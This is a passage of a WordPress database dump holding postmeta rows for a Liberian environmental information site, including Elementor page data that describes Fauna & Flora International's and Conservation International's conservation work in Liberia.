2019'),(20507,2993,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/02/tna-report-coastal-zone-liberia.pdf'),(20508,2993,'_pods_cover_image','a:1:{i:0;i:573;}'),(20509,2993,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(20512,2993,'_pods_attached_document','a:1:{i:0;i:2994;}'),(20514,2993,'_dp_original','2751'),(20515,2993,'_edit_lock','1670325104:42'),(20516,2993,'_edit_last','42'),(20517,2994,'_wp_attached_file','2020/02/tna-report-coastal-zone-liberia.pdf'),(20524,2993,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628798796;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3278;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:3285;}}}}'),(20537,2964,'_edit_last','42'),(20549,3001,'_wp_attached_file','2020/02/future-project.jpg'),(20550,3001,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2020/02/future-project.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"future-project-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"future-project-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"future-project-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"future-project-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20551,3002,'_elementor_template_type','wp-post'),(20552,3002,'_elementor_version','2.7.5'),(20553,3002,'_wp_page_template','default'),(20554,3002,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects \",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ee507b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/02\\/future-project.jpg\",\"id\":3001},\"image_size\":\"medium\",\"caption_source\":\"custom\",\"caption\":\"Water, sanitation and hygiene\",\"link_to\":\"custom\",\"link\":{\"url\":\"www.habitat.org\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20556,3002,'_elementor_edit_mode','builder'),(20559,3003,'_elementor_template_type','wp-post'),(20560,3003,'_elementor_version','2.8.1'),(20561,3003,'_wp_page_template','default'),(20562,3003,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects \",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ee507b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"medium\",\"caption\":\"Water, sanitation and hygiene\",\"link\":{\"url\":\"www.habitat.org\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20564,3003,'_elementor_edit_mode','builder'),(20566,2964,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;s:7:\"caption\";i:1;s:4:\"link\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20568,3004,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20569,3004,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20570,3004,'slide_template','default'),(20571,3004,'slide_template','default'),(20574,3004,'_elementor_template_type','wp-post'),(20575,3004,'_elementor_template_type','wp-post'),(20576,3004,'_elementor_version','2.7.5'),(20577,3004,'_elementor_version','2.7.5'),(20578,3004,'_wp_page_template','default'),(20579,3004,'_wp_page_template','default'),(20580,3004,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20581,3004,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of 